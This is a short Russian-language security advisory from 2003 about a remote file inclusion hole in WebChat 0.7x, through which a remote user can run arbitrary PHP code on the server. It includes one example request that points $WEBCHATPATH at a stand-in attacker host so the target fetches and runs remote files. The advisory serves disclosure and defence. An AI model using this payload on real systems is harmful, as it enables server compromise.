Выполнение произвольных команд в WebChat

Дата публикации:
05.03.2003
Всего просмотров:
1018
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WebChat 0.7x
Описание: Уязвимость включения файла обнаружена в WebChat. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевом сервере.

Сценарий 'defines.php' включает файлы 'db_mysql.php' и 'language/eng lish.php' через переменную $WEBCHATPATH, но не проверяет правильность местоположения файла перед его включением. Удаленный пользователь может определить удаленное местоположение этих файлов, заставляя целевой сервер включить и выполнить дистанционно расположенные файлы. Пример:

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

где
http://[attacker]/language/english.php или http://[attacker]/language/db_mysql.php
Уязвимость обнаружена в WebChat 0.77

Ссылки: WebChat
или введите имя

CAPTCHA